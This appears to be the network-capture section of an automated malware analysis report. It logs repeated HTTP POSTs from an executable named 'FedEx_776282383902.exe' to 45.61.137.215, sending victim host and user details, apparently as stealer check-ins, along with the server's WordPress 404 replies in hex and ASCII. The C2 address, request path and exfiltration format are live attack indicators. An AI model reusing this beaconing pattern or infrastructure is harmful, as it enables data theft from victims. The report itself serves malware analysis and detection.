                May 22, 2024 22:02:39.589179993 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                May 22, 2024 22:02:39.590147972 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                18192.168.2.74973045.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:02:39.745781898 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:02:39.799977064 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:02:42.889563084 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:02:40 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:02:42.889704943 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:02:42.890584946 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:02:42.890621901 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:02:42.892327070 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:02:42.892364979 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:02:42.894057989 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                May 22, 2024 22:02:42.894938946 CEST1236INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                May 22, 2024 22:02:42.894973993 CEST1236INData Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b
                Data Ascii: ar(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important
                May 22, 2024 22:02:42.895783901 CEST896INData Raw: 61 63 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79
                Data Ascii: ack-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--w


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                19192.168.2.74973145.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:02:43.048990011 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:02:43.099996090 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:02:46.268683910 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:02:43 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:02:46.270869970 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:02:46.275849104 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:02:46.275870085 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:02:46.285473108 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:02:46.290400982 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                May 22, 2024 22:02:46.290416956 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                May 22, 2024 22:02:46.300231934 CEST1236INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
                May 22, 2024 22:02:46.303313971 CEST1236INData Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
                May 22, 2024 22:02:46.303330898 CEST556INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                20192.168.2.74973245.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:02:46.431591034 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:02:46.480099916 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:02:49.352571011 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:02:46 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:02:49.353880882 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                May 22, 2024 22:02:49.356919050 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                May 22, 2024 22:02:49.359966993 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                May 22, 2024 22:02:49.359985113 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                May 22, 2024 22:02:49.359999895 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                May 22, 2024 22:02:49.373689890 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
